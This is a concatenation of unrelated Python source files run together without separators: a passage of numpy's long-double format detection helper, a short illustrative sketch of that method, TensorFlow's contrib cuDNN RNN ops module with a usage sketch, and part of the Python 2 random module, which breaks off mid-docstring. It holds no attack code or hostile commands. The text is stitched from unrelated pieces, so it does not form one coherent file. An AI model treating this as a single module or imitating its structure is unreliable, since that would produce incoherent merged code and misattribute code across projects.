dump from. Returns ------- out : seq list of lines of od output Note ---- We only implement enough to get the necessary information for long double representation, this is not intended as a compatible replacement for od. """ def _pyod2(): out = [] fid = open(filename, 'rb') try: yo = [int(oct(int(binascii.b2a_hex(o), 16))) for o in fid.read()] for i in range(0, len(yo), 16): line = ['%07d' % int(oct(i))] line.extend(['%03d' % c for c in yo[i:i+16]]) out.append(" ".join(line)) return out finally: fid.close() def _pyod3(): out = [] fid = open(filename, 'rb') try: yo2 = [oct(o)[2:] for o in fid.read()] for i in range(0, len(yo2), 16): line = ['%07d' % int(oct(i)[2:])] line.extend(['%03d' % int(c) for c in yo2[i:i+16]]) out.append(" ".join(line)) return out finally: fid.close() if sys.version_info[0] < 3: return _pyod2() else: return _pyod3() _BEFORE_SEQ = ['000', '000', '000', '000', '000', '000', '000', '000', '001', '043', '105', '147', '211', '253', '315', '357'] _AFTER_SEQ = ['376', '334', '272', '230', '166', '124', '062', '020'] _IEEE_DOUBLE_BE = ['301', '235', '157', '064', '124', '000', '000', '000'] _IEEE_DOUBLE_LE = _IEEE_DOUBLE_BE[::-1] _INTEL_EXTENDED_12B = ['000', '000', '000', '000', '240', '242', '171', '353', '031', '300', '000', '000'] _INTEL_EXTENDED_16B = ['000', '000', '000', '000', '240', '242', '171', '353', '031', '300', '000', '000', '000', '000', '000', '000'] _MOTOROLA_EXTENDED_12B = ['300', '031', '000', '000', '353', '171', '242', '240', '000', '000', '000', '000'] _IEEE_QUAD_PREC_BE = ['300', '031', '326', '363', '105', '100', '000', '000', '000', '000', '000', '000', '000', '000', '000', '000'] _IEEE_QUAD_PREC_LE = _IEEE_QUAD_PREC_BE[::-1] _DOUBLE_DOUBLE_BE = (['301', '235', '157', '064', '124', '000', '000', '000'] + ['000'] * 8) _DOUBLE_DOUBLE_LE = (['000', '000', '000', '124', '064', '157', '235', '301'] + ['000'] * 8) def long_double_representation(lines): """Given a binary dump as given by GNU od -b, look for long double representation.""" # Read contains a list of 32 items, each item is a byte (in octal # representation, as a string). 
We 'slide' over the output until read is of # the form before_seq + content + after_sequence, where content is the long double # representation: # - content is 12 bytes: 80 bits Intel representation # - content is 16 bytes: 80 bits Intel representation (64 bits) or quad precision # - content is 8 bytes: same as double (not implemented yet) read = [''] * 32 saw = None for line in lines: # we skip the first word, as od -b output an index at the beginning of # each line for w in line.split()[1:]: read.pop(0) read.append(w) # If the end of read is equal to the after_sequence, read contains # the long double if read[-8:] == _AFTER_SEQ: saw = copy.copy(read) if read[:12] == _BEFORE_SEQ[4:]: if read[12:-8] == _INTEL_EXTENDED_12B: return 'INTEL_EXTENDED_12_BYTES_LE' if read[12:-8] == _MOTOROLA_EXTENDED_12B: return 'MOTOROLA_EXTENDED_12_BYTES_BE' elif read[:8] == _BEFORE_SEQ[8:]: if read[8:-8] == _INTEL_EXTENDED_16B: return 'INTEL_EXTENDED_16_BYTES_LE' elif read[8:-8] == _IEEE_QUAD_PREC_BE: return 'IEEE_QUAD_BE' elif read[8:-8] == _IEEE_QUAD_PREC_LE: return 'IEEE_QUAD_LE' elif read[8:-8] == _DOUBLE_DOUBLE_BE: return 'DOUBLE_DOUBLE_BE' elif read[8:-8] == _DOUBLE_DOUBLE_LE: return 'DOUBLE_DOUBLE_LE' elif read[:16] == _BEFORE_SEQ: if read[16:-8] == _IEEE_DOUBLE_LE: return 'IEEE_DOUBLE_LE' elif read[16:-8] == _IEEE_DOUBLE_BE: return 'IEEE_DOUBLE_BE' if saw is not None: raise ValueError("Unrecognized format (%s)" % saw) else: # We never detected the after_sequence raise ValueError("Could not lock sequences (%s)" % saw)
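# A minimal, self-contained sketch of the detection strategy used above:
# long_double_representation() slides a fixed-size window over an `od -b`
# style octal dump until the 16-byte "before" sentinel and the 8-byte "after"
# sentinel line up, and whatever sits between them is the long double bit
# pattern.  This is illustrative only (not the numpy build helper); the 4-byte
# payload below is hypothetical, and the sketch targets Python 3.

_SKETCH_BEFORE = (['000'] * 8 +
                  ['001', '043', '105', '147', '211', '253', '315', '357'])
_SKETCH_AFTER = ['376', '334', '272', '230', '166', '124', '062', '020']

def sketch_octal_dump(data, width=16):
    # od -b style output: octal offset followed by per-byte octal values.
    lines = []
    for i in range(0, len(data), width):
        chunk = data[i:i + width]
        lines.append('%07o ' % i + ' '.join('%03o' % b for b in chunk))
    return lines

def sketch_find_payload(lines, payload_len):
    # Flatten the dump (dropping the offset column) and slide a window of
    # len(before) + payload_len + len(after) bytes over it.
    read = []
    for line in lines:
        read.extend(line.split()[1:])
    window = len(_SKETCH_BEFORE) + payload_len + len(_SKETCH_AFTER)
    for i in range(len(read) - window + 1):
        chunk = read[i:i + window]
        if (chunk[:len(_SKETCH_BEFORE)] == _SKETCH_BEFORE and
                chunk[-len(_SKETCH_AFTER):] == _SKETCH_AFTER):
            return chunk[len(_SKETCH_BEFORE):len(_SKETCH_BEFORE) + payload_len]
    return None

if __name__ == "__main__":
    payload = [0o300, 0o031, 0o326, 0o363]   # hypothetical payload bytes
    buf = (bytes(int(o, 8) for o in _SKETCH_BEFORE) + bytes(payload) +
           bytes(int(o, 8) for o in _SKETCH_AFTER))
    print(sketch_find_payload(sketch_octal_dump(buf), len(payload)))
    # -> ['300', '031', '326', '363']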
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Cudnn RNN operators.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import itertools from tensorflow.contrib.cudnn_rnn.ops import gen_cudnn_rnn_ops from tensorflow.contrib.util import loader from tensorflow.python.framework import common_shapes from tensorflow.python.framework import dtypes from tensorflow.python.framework import ops from tensorflow.python.framework import random_seed from tensorflow.python.ops import array_ops from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import state_ops from tensorflow.python.platform import resource_loader from tensorflow.python.training import saver _cudnn_rnn_ops_so = loader.load_op_library( resource_loader.get_path_to_datafile("_cudnn_rnn_ops.so")) # TODO(yaozhang): make sure we only save the canonical version of params and # don't save the platform-specific version to avoid potential race # conditions where params is updated by both versions when being restored. # Currently, checkpointing will function properly, despite that we save both # versions, because Saver restores customized savables after Variables. # However, it is good to not rely on this restoring order of Saver and to # avoid unnecessary storage. Add a test to check only the canonical version is # saved. class RNNParamsSaveable(saver.BaseSaverBuilder.SaveableObject): """SaveableObject implementation that handles the RNN params variable.""" def __init__(self, params_to_canonical, canonical_to_params, param_variables, name="params_canonical"): """Creates a RNNParamsSaveable object. RNNParamsSaveable is saveable/restorable in a checkpoint file and is used to save/restore the weights and biases parameters in a canonical format, where parameters are saved as tensors layer by layer. For each layer, the bias tensors are saved following the weight tensors. When restoring, a user could name param_variables as desired, and restore weight and bias tensors to these variables. For CudnnRNNRelu or CudnnRNNTanh, there are 2 tensors per weight and per bias for each layer: tensor 0 is applied to the input from the previous layer and tensor 1 to the recurrent input. For CudnnLSTM, there are 8 tensors per weight and per bias for each layer: tensor 0-3 are applied to the input from the previous layer and tensor 4-7 to the recurrent input. Tensor 0 and 4 are for the input gate; tensor 1 and 5 the forget gate; tensor 2 and 6 the new memory gate; tensor 3 and 7 the output gate. For CudnnGRU, there are 6 tensors per weight and per bias for each layer: tensor 0-2 are applied to the input from the previous layer and tensor 3-5 to the recurrent input. Tensor 0 and 3 are for the reset gate; tensor 1 and 4 the update gate; tensor 2 and 5 the new memory gate. 
Args: params_to_canonical: a function to convert params from a specific format for cuDNN or other RNN ops to the canonical format. _CudnnRNN.params_to_canonical() should be provided here. canonical_to_params: a function to convert params from the canonical format to a specific format for cuDNN or other RNN ops. The function must return a scalar (e.g. in the case of cuDNN) or a tuple. This function could be _CudnnRNN.canonical_to_params() or a user-defined function. param_variables: a list of Variables for parameters in a specific form. For cuDNN RNN ops, this is a single merged variable for both weights and biases; for other RNN ops, this might be multiple unmerged or partially merged variables respectively for weights and biases. name: the name of the RNNParamsSaveable object. """ # There is only a single merged parameter variable for cuDNN when saving. weights, biases = params_to_canonical(param_variables[0]) self._canonical_to_params = canonical_to_params self._variables = param_variables # We currently don't use slice_spec. It might be useful in a distributed # setting where each parameter server node stores a slice of variable, # instead of having the master pull all slices and then save them. slice_spec = "" specs = [ saver.BaseSaverBuilder.SaveSpec(param, slice_spec, param.name) for param in itertools.chain(weights, biases) ] super(RNNParamsSaveable, self).__init__(None, specs, name) def restore(self, restored_tensors, restored_shapes): weights = restored_tensors[:len(restored_tensors) // 2] biases = restored_tensors[len(restored_tensors) // 2:] params = self._canonical_to_params(weights, biases) if not isinstance(params, tuple): params = (params,) assign_ops = [ state_ops.assign(variable, param, validate_shape=False) for variable, param in zip(self._variables, params) ] return control_flow_ops.group(*assign_ops) _cudnn_rnn_common_doc_string = """ Cudnn RNN has an opaque parameter buffer that can be used for inference and training. But it is possible that the layout of the parameter buffers changes between generations. So it is highly recommended to use RNNParamsSaveable to save and restore weights and biases in a canonical format. This is a typical use case: * The user creates a CudnnRNN model. * The user query that parameter buffer size. * The user creates a variable of that size that serves as the parameter buffers. * The user either initialize the parameter buffer, or load the canonical weights into the parameter buffer. * The user calls the model with the parameter buffer for inference, or training. * If training, the user creates a Saver object. * If training, the user creates a RNNParamsSaveable object from the parameter buffer for it to be later saved in the canonical format. When creating a RNNParamsSaveable object, a name could be provided, which is useful in distinguishing the names of multiple RNNParamsSaveable objects (e.g. for an encoder-decoder model). * Once a while, the user saves the parameter buffer into model checkpoints with Saver.save(). * When restoring, the user creates a RNNParamsSaveable object and uses Saver.restore() to restore the parameter buffer from the canonical format to a user-defined format, as well as to restore other savable objects in the checkpoint file. """ class _CudnnRNN(object): """Creates an RNN model using the underlying Cudnn implementation. Note that self._NUM_PARAMS_PER_LAYER is the number of parameter sets of weight and bias per layer. It needs to be defined in subclasses. 
""" __doc__ += _cudnn_rnn_common_doc_string def __init__(self, rnn_mode, num_layers, num_units, input_size, input_mode="linear_input", direction="unidirectional", dropout=0., seed=0): """Creates a CudnnRNN model from model spec. Args: rnn_mode: a string specifies the mode, under which this RNN model runs. Could be either 'lstm', 'gru', 'rnn_tanh' or 'rnn_relu'. num_layers: the number of layers for the RNN model. num_units: the number of units within the RNN model. input_size: the size of the input, it could be different from the num_units. input_mode: indicate whether there is a linear projection between the input and the actual computation before the first layer. It could be 'linear_input', 'skip_input' or 'auto_select'. 'linear_input' (default) always applies a linear projection of input onto RNN hidden state. (standard RNN behavior). 'skip_input' is only allowed when input_size == num_units; 'auto_select' implies 'skip_input' when input_size == num_units; otherwise, it implies 'linear_input'. direction: the direction model that the model operates. Could be either 'unidirectional' or 'bidirectional' dropout: whether to enable dropout. With it is 0, dropout is disabled. seed: the op seed used for initializing dropout. See @{tf.set_random_seed} for behavior. """ self._num_layers = num_layers self._num_units = num_units self._input_size = input_size self._rnn_mode = rnn_mode self._input_mode = input_mode self._direction = direction self._dropout = dropout # get graph and op seed. self._seed, self._seed2 = random_seed.get_seed(seed) if self._seed is None and self._seed2 is None: self._seed, self._seed2 = 0, 0 def params_size(self): """Calculates the size of the opaque parameter buffer needed for this model. Returns: The calculated parameter buffer size. """ return gen_cudnn_rnn_ops.cudnn_rnn_params_size( num_layers=self._num_layers, num_units=self._num_units, input_size=self._input_size, T=dtypes.float32, S=dtypes.int32, dropout=self._dropout, seed=self._seed, seed2=self._seed2, rnn_mode=self._rnn_mode, input_mode=self._input_mode, direction=self._direction)[0] def __call__(self, input_data, input_h, input_c, params, is_training=True): """Runs the forward step for the RNN model. Args: input_data: the input sequence to the RNN model. input_h: the initial hidden state for h. input_c: the initial hidden state for c. This is only relevant for LSTM. params: the parameter buffer created for this model. is_training: whether this operation will be used in training or inference. Returns: output: the output sequuence. output_h: the final state for h. output_c: the final state for c. This is only relevant for LSTM. """ if self._rnn_mode != "lstm": # For model that doesn't take input_c, replace with a dummy tensor. input_c = array_ops.constant([], dtype=dtypes.float32) output, output_h, output_c, _ = gen_cudnn_rnn_ops.cudnn_rnn( input=input_data, input_h=input_h, input_c=input_c, params=params, rnn_mode=self._rnn_mode, input_mode=self._input_mode, direction=self._direction, dropout=self._dropout, seed=self._seed, seed2=self._seed2, is_training=is_training) return (output, output_h, output_c) def params_to_canonical(self, params): """Converts params from a specific format of cuDNN to the canonical format. Args: params: a Variable for weight and bias parameters. Returns: A function for the specific-to-canonical conversion. 
""" weights, biases = gen_cudnn_rnn_ops.cudnn_rnn_params_to_canonical( num_layers=self._num_layers, num_units=self._num_units, input_size=self._input_size, params=params, dropout=self._dropout, seed=self._seed, seed2=self._seed2, num_params=self._num_layers * self._NUM_PARAMS_PER_LAYER, rnn_mode=self._rnn_mode, input_mode=self._input_mode, direction=self._direction) return weights, biases def canonical_to_params(self, weights, biases): """Converts params from the canonical format to a specific format of cuDNN. Args: weights: a Tensor for weight parameters. biases: a Tensor for bias parameters. Returns: A function for the canonical-to-params-to-specific conversion.. """ return gen_cudnn_rnn_ops.cudnn_rnn_canonical_to_params( num_layers=self._num_layers, num_units=self._num_units, input_size=self._input_size, weights=weights, biases=biases, dropout=self._dropout, seed=self._seed, seed2=self._seed2, rnn_mode=self._rnn_mode, input_mode=self._input_mode, direction=self._direction) class CudnnLSTM(_CudnnRNN): """Cudnn implementation of the LSTM model.""" __doc__ += _cudnn_rnn_common_doc_string # 4 sets of weight and bias parameters for the recurrent input, and 4 for the # previous layer input. _NUM_PARAMS_PER_LAYER = 8 def __init__(self, num_layers, num_units, input_size, input_mode="auto_select", direction="unidirectional", dropout=0., seed=0): """Creates a Cudnn LSTM model from model spec. Args: num_layers: the number of layers for the RNN model. num_units: the number of units within the RNN model. input_size: the size of the input, it could be different from the num_units. input_mode: indicate whether there is a linear projection between the input and The actual computation before the first layer. It could be 'skip_input', 'linear_input' or 'auto_select'. 'skip_input' is only allowed when input_size == num_units; 'auto_select' implies 'skip_input' when input_size == num_units; otherwise, it implies 'linear_input'. direction: the direction model that the model operates. Could be either 'unidirectional' or 'bidirectional' dropout: whether to enable dropout. With it is 0, dropout is disabled. seed: the seed used for initializing dropout. """ super(CudnnLSTM, self).__init__( "lstm", num_layers, num_units, input_size, input_mode=input_mode, direction=direction, dropout=dropout, seed=seed) def __call__(self, input_data, input_h, input_c, params, is_training=True): """Runs the forward step for the Cudnn LSTM model. Args: input_data: the input sequence to the LSTM model. input_h: the initial hidden state for h. input_c: the initial hidden state for c. params: the parameter buffer created for this model. is_training: whether this operation will be used in training or inference. Returns: output: the output sequuence. output_h: the final state for h. output_c: the final state for c. """ output, output_h, output_c = super(CudnnLSTM, self).__call__( input_data, input_h, input_c, params, is_training=is_training) return (output, output_h, output_c) class _CudnnRNNNoInputC(_CudnnRNN): """Simple CudnnRNN models without input_c.""" __doc__ += _cudnn_rnn_common_doc_string def __init__(self, num_layers, num_units, input_size, input_mode="auto_select", direction="unidirectional", dropout=0., seed=0): """Creates a Cudnn RNN model from model without hidden-state C. Args: num_layers: the number of layers for the RNN model. num_units: the number of units within the RNN model. input_size: the size of the input, it could be different from the num_units. 
input_mode: indicate whether there is a linear projection between the input and The actual computation before the first layer. It could be 'skip_input', 'linear_input' or 'auto_select'. 'skip_input' is only allowed when input_size == num_units; 'auto_select' implies 'skip_input' when input_size == num_units; otherwise, it implies 'linear_input'. direction: the direction model that the model operates. Could be either 'unidirectional' or 'bidirectional' dropout: whether to enable dropout. With it is 0, dropout is disabled. seed: the seed used for initializing dropout. """ super(_CudnnRNNNoInputC, self).__init__( self._rnn_mode, num_layers, num_units, input_size, input_mode=input_mode, direction=direction, dropout=dropout, seed=seed) def __call__(self, input_data, input_h, params, is_training=True): """Runs the forward step for the Cudnn LSTM model. Args: input_data: the input sequence to the LSTM model. input_h: the initial hidden state for h. params: the parameter buffer created for this model. is_training: whether this operation will be used in training or inference. Returns: output: the output sequuence. output_h: the final state for h. """ output, output_h, _ = super(_CudnnRNNNoInputC, self).__call__( input_data, input_h, None, params, is_training=is_training) return (output, output_h) class CudnnGRU(_CudnnRNNNoInputC): """Cudnn implementation of the GRU model.""" __doc__ += _cudnn_rnn_common_doc_string _rnn_mode = "gru" # 3 sets of weight and bias parameters for the recurrent input, and 3 for the # previous layer input. _NUM_PARAMS_PER_LAYER = 6 class CudnnRNNTanh(_CudnnRNNNoInputC): """Cudnn implementation of the RNN-tanh model.""" __doc__ += _cudnn_rnn_common_doc_string _rnn_mode = "rnn_tanh" # 1 set of weight and bias parameters for the recurrent input, and 1 for the # previous layer input. _NUM_PARAMS_PER_LAYER = 2 class CudnnRNNRelu(_CudnnRNNNoInputC): """Cudnn implementation of the RNN-relu model.""" __doc__ += _cudnn_rnn_common_doc_string _rnn_mode = "rnn_relu" # 1 set of weight and bias parameters for the recurrent input, and 1 for the # previous layer input. _NUM_PARAMS_PER_LAYER = 2 @ops.RegisterGradient("CudnnRNN") def _cudnn_rnn_backward(op, *grad): if not op.get_attr("is_training"): raise ValueError( "CudnnRNN must set is_training to True to be used in gradients") return gen_cudnn_rnn_ops.cudnn_rnn_backprop( input=op.inputs[0], input_h=op.inputs[1], input_c=op.inputs[2], params=op.inputs[3], output=op.outputs[0], output_h=op.outputs[1], output_c=op.outputs[2], output_backprop=grad[0], output_h_backprop=grad[1], output_c_backprop=grad[2], reserve_space=op.outputs[3], dropout=op.get_attr("dropout"), seed=op.get_attr("seed"), seed2=op.get_attr("seed2"), rnn_mode=op.get_attr("rnn_mode"), input_mode=op.get_attr("input_mode"), direction=op.get_attr("direction")) ops.RegisterShape("CudnnRNNParamsSize")(common_shapes.call_cpp_shape_fn) ops.RegisterShape("CudnnRNNParamsToCanonical")(common_shapes.call_cpp_shape_fn) ops.RegisterShape("CudnnRNNCanonicalToParams")(common_shapes.call_cpp_shape_fn) ops.RegisterShape("CudnnRNN")(common_shapes.call_cpp_shape_fn) ops.RegisterShape("CudnnRNNBackprop")(common_shapes.call_cpp_shape_fn)
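# A sketch of the usage pattern described in _cudnn_rnn_common_doc_string:
# build a CudnnLSTM, size and allocate its opaque parameter buffer, run the
# forward step, and register an RNNParamsSaveable so checkpoints hold the
# canonical per-layer weights and biases.  This assumes a GPU build of
# TensorFlow 1.x in which this contrib module is importable; the import path
# and the shape constants are illustrative assumptions, not fixed values.

import tensorflow as tf
from tensorflow.contrib.cudnn_rnn.python.ops import cudnn_rnn_ops  # assumed path

time_len, batch_size, num_layers, num_units, input_size = 20, 8, 2, 128, 64

model = cudnn_rnn_ops.CudnnLSTM(num_layers, num_units, input_size)

# The op itself reports how large the opaque parameter buffer must be.
params_size_t = model.params_size()
params = tf.Variable(tf.random_uniform([params_size_t]), validate_shape=False)

input_data = tf.placeholder(tf.float32, [time_len, batch_size, input_size])
input_h = tf.placeholder(tf.float32, [num_layers, batch_size, num_units])
input_c = tf.placeholder(tf.float32, [num_layers, batch_size, num_units])
output, output_h, output_c = model(input_data, input_h, input_c, params,
                                   is_training=True)

# Save/restore the opaque buffer in the canonical layer-by-layer format.
saveable = cudnn_rnn_ops.RNNParamsSaveable(model.params_to_canonical,
                                           model.canonical_to_params,
                                           [params])
tf.add_to_collection(tf.GraphKeys.SAVEABLE_OBJECTS, saveable)
saver = tf.train.Saver()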
"""Random variable generators. integers -------- uniform within range sequences --------- pick random element pick random sample generate random permutation distributions on the real line: ------------------------------ uniform triangular normal (Gaussian) lognormal negative exponential gamma beta pareto Weibull distributions on the circle (angles 0 to 2pi) --------------------------------------------- circular uniform von Mises General notes on the underlying Mersenne Twister core generator: * The period is 2**19937-1. * It is one of the most extensively tested generators in existence. * Without a direct way to compute N steps forward, the semantics of jumpahead(n) are weakened to simply jump to another distant state and rely on the large period to avoid overlapping sequences. * The random() method is implemented in C, executes in a single Python step, and is, therefore, threadsafe. """ from __future__ import division from warnings import warn as _warn from types import MethodType as _MethodType, BuiltinMethodType as _BuiltinMethodType from math import log as _log, exp as _exp, pi as _pi, e as _e, ceil as _ceil from math import sqrt as _sqrt, acos as _acos, cos as _cos, sin as _sin from os import urandom as _urandom from binascii import hexlify as _hexlify __all__ = ["Random","seed","random","uniform","randint","choice","sample", "randrange","shuffle","normalvariate","lognormvariate", "expovariate","vonmisesvariate","gammavariate","triangular", "gauss","betavariate","paretovariate","weibullvariate", "getstate","setstate","jumpahead", "WichmannHill", "getrandbits", "SystemRandom"] NV_MAGICCONST = 4 * _exp(-0.5)/_sqrt(2.0) TWOPI = 2.0*_pi LOG4 = _log(4.0) SG_MAGICCONST = 1.0 + _log(4.5) BPF = 53 # Number of bits in a float RECIP_BPF = 2**-BPF # Translated by Guido van Rossum from C source provided by # Adrian Baddeley. Adapted by Raymond Hettinger for use with # the Mersenne Twister and os.urandom() core generators. import _random class Random(_random.Random): """Random number generator base class used by bound module functions. Used to instantiate instances of Random to get generators that don't share state. Especially useful for multi-threaded programs, creating a different instance of Random for each thread, and using the jumpahead() method to ensure that the generated sequences seen by each thread don't overlap. Class Random can also be subclassed if you want to use a different basic generator of your own devising: in that case, override the following methods: random(), seed(), getstate(), setstate() and jumpahead(). Optionally, implement a getrandbits() method so that randrange() can cover arbitrarily large ranges. """ VERSION = 3 # used by getstate/setstate def __init__(self, x=None): """Initialize an instance. Optional argument x controls seeding, as for Random.seed(). """ self.seed(x) self.gauss_next = None def seed(self, a=None): """Initialize internal state from hashable object. None or no argument seeds from current time or from an operating system specific randomness source if available. If a is not None or an int or long, hash(a) is used instead. 
""" if a is None: try: a = long(_hexlify(_urandom(16)), 16) except NotImplementedError: import time a = long(time.time() * 256) # use fractional seconds super(Random, self).seed(a) self.gauss_next = None def getstate(self): """Return internal state; can be passed to setstate() later.""" return self.VERSION, super(Random, self).getstate(), self.gauss_next def setstate(self, state): """Restore internal state from object returned by getstate().""" version = state[0] if version == 3: version, internalstate, self.gauss_next = state super(Random, self).setstate(internalstate) elif version == 2: version, internalstate, self.gauss_next = state # In version 2, the state was saved as signed ints, which causes # inconsistencies between 32/64-bit systems. The state is # really unsigned 32-bit ints, so we convert negative ints from # version 2 to positive longs for version 3. try: internalstate = tuple( long(x) % (2**32) for x in internalstate ) except ValueError, e: raise TypeError, e super(Random, self).setstate(internalstate) else: raise ValueError("state with version %s passed to " "Random.setstate() of version %s" % (version, self.VERSION)) ## ---- Methods below this point do not need to be overridden when ## ---- subclassing for the purpose of using a different core generator. ## -------------------- pickle support ------------------- def __getstate__(self): # for pickle return self.getstate() def __setstate__(self, state): # for pickle self.setstate(state) def __reduce__(self): return self.__class__, (), self.getstate() ## -------------------- integer methods ------------------- def randrange(self, start, stop=None, step=1, int=int, default=None, maxwidth=1L<<BPF): """Choose a random item from range(start, stop[, step]). This fixes the problem with randint() which includes the endpoint; in Python this is usually not what you want. Do not supply the 'int', 'default', and 'maxwidth' arguments. """ # This code is a bit messy to make it fast for the # common case while still doing adequate error checking. istart = int(start) if istart != start: raise ValueError, "non-integer arg 1 for randrange()" if stop is default: if istart > 0: if istart >= maxwidth: return self._randbelow(istart) return int(self.random() * istart) raise ValueError, "empty range for randrange()" # stop argument supplied. istop = int(stop) if istop != stop: raise ValueError, "non-integer stop for randrange()" width = istop - istart if step == 1 and width > 0: # Note that # int(istart + self.random()*width) # instead would be incorrect. For example, consider istart # = -2 and istop = 0. Then the guts would be in # -2.0 to 0.0 exclusive on both ends (ignoring that random() # might return 0.0), and because int() truncates toward 0, the # final result would be -1 or 0 (instead of -2 or -1). # istart + int(self.random()*width) # would also be incorrect, for a subtler reason: the RHS # can return a long, and then randrange() would also return # a long, but we're supposed to return an int (for backward # compatibility). if width >= maxwidth: return int(istart + self._randbelow(width)) return int(istart + int(self.random()*width)) if step == 1: raise ValueError, "empty range for randrange() (%d,%d, %d)" % (istart, istop, width) # Non-unit step argument supplied. 
istep = int(step) if istep != step: raise ValueError, "non-integer step for randrange()" if istep > 0: n = (width + istep - 1) // istep elif istep < 0: n = (width + istep + 1) // istep else: raise ValueError, "zero step for randrange()" if n <= 0: raise ValueError, "empty range for randrange()" if n >= maxwidth: return istart + istep*self._randbelow(n) return istart + istep*int(self.random() * n) def randint(self, a, b): """Return random integer in range [a, b], including both end points. """ return self.randrange(a, b+1) def _randbelow(self, n, _log=_log, int=int, _maxwidth=1L<<BPF, _Method=_MethodType, _BuiltinMethod=_BuiltinMethodType): """Return a random int in the range [0,n) Handles the case where n has more bits than returned by a single call to the underlying generator. """ try: getrandbits = self.getrandbits except AttributeError: pass else: # Only call self.getrandbits if the original random() builtin method # has not been overridden or if a new getrandbits() was supplied. # This assures that the two methods correspond. if type(self.random) is _BuiltinMethod or type(getrandbits) is _Method: k = int(1.00001 + _log(n-1, 2.0)) # 2**k > n-1 > 2**(k-2) r = getrandbits(k) while r >= n: r = getrandbits(k) return r if n >= _maxwidth: _warn("Underlying random() generator does not supply \n" "enough bits to choose from a population range this large") return int(self.random() * n) ## -------------------- sequence methods ------------------- def choice(self, seq): """Choose a random element from a non-empty sequence.""" return seq[int(self.random() * len(seq))] # raises IndexError if seq is empty def shuffle(self, x, random=None, int=int): """x, random=random.random -> shuffle list x in place; return None. Optional arg random is a 0-argument function returning a random float in [0.0, 1.0); by default, the standard random.random. """ if random is None: random = self.random for i in reversed(xrange(1, len(x))): # pick an element in x[:i+1] with which to exchange x[i] j = int(random() * (i+1)) x[i], x[j] = x[j], x[i] def sample(self, population, k): """Chooses k unique random elements from a population sequence. Returns a new list containing elements from the population while leaving the original population unchanged. The resulting list is in selection order so that all sub-slices will also be valid random samples. This allows raffle winners (the sample) to be partitioned into grand prize and second place winners (the subslices). Members of the population need not be hashable or unique. If the population contains repeats, then each occurrence is a possible selection in the sample. To choose a sample in a range of integers, use xrange as an argument. This is especially fast and space efficient for sampling from a large population: sample(xrange(10000000), 60) """ # XXX Although the documentation says `population` is "a sequence", # XXX attempts are made to cater to any iterable with a __len__ # XXX method. This has had mixed success. Examples from both # XXX sides: sets work fine, and should become officially supported; # XXX dicts are much harder, and have failed in various subtle # XXX ways across attempts. Support for mapping types should probably # XXX be dropped (and users should pass mapping.keys() or .values() # XXX explicitly). # Sampling without replacement entails tracking either potential # selections (the pool) in a list or previous selections in a set. 
# When the number of selections is small compared to the # population, then tracking selections is efficient, requiring # only a small set and an occasional reselection. For # a larger number of selections, the pool tracking method is # preferred since the list takes less space than the # set and it doesn't suffer from frequent reselections. n = len(population) if not 0 <= k <= n: raise ValueError, "sample larger than population" random = self.random _int = int result = [None] * k setsize = 21 # size of a small set minus size of an empty list if k > 5: setsize += 4 ** _ceil(_log(k * 3, 4)) # table size for big sets if n <= setsize or hasattr(population, "keys"): # An n-length list is smaller than a k-length set, or this is a # mapping type so the other algorithm wouldn't work. pool = list(population) for i in xrange(k): # invariant: non-selected at [0,n-i) j = _int(random() * (n-i)) result[i] = pool[j] pool[j] = pool[n-i-1] # move non-selected item into vacancy else: try: selected = set() selected_add = selected.add for i in xrange(k): j = _int(random() * n) while j in selected: j = _int(random() * n) selected_add(j) result[i] = population[j] except (TypeError, KeyError): # handle (at least) sets if isinstance(population, list): raise return self.sample(tuple(population), k) return result ## -------------------- real-valued distributions ------------------- ## -------------------- uniform distribution ------------------- def uniform(self, a, b): "Get a random number in the range [a, b) or [a, b] depending on rounding." return a + (b-a) * self.random() ## -------------------- triangular -------------------- def triangular(self, low=0.0, high=1.0, mode=None): """Triangular distribution. Continuous distribution bounded by given lower and upper limits, and having a given mode value in-between. http://en.wikipedia.org/wiki/Triangular_distribution """ u = self.random() c = 0.5 if mode is None else (mode - low) / (high - low) if u > c: u = 1.0 - u c = 1.0 - c low, high = high, low return low + (high - low) * (u * c) ** 0.5 ## -------------------- normal distribution -------------------- def normalvariate(self, mu, sigma): """Normal distribution. mu is the mean, and sigma is the standard deviation. """ # mu = mean, sigma = standard deviation # Uses Kinderman and Monahan method. Reference: Kinderman, # A.J. and Monahan, J.F., "Computer generation of random # variables using the ratio of uniform deviates", ACM Trans # Math Software, 3, (1977), pp257-260. random = self.random while 1: u1 = random() u2 = 1.0 - random() z = NV_MAGICCONST*(u1-0.5)/u2 zz = z*z/4.0 if zz <= -_log(u2): break return mu + z*sigma ## -------------------- lognormal distribution -------------------- def lognormvariate(self, mu, sigma): """Log normal distribution. If you take the natural logarithm of this distribution, you'll get a normal distribution with mean mu and standard deviation sigma. mu can have any value, and sigma must be greater than zero. """ return _exp(self.normalvariate(mu, sigma)) ## -------------------- exponential distribution -------------------- def expovariate(self, lambd): """Exponential distribution. lambd is 1.0 divided by the desired mean. It should be nonzero. (The parameter would be called "lambda", but that is a reserved word in Python.) Returned values range from 0 to positive infinity if lambd is positive, and from negative infinity to 0 if lambd is negative. 
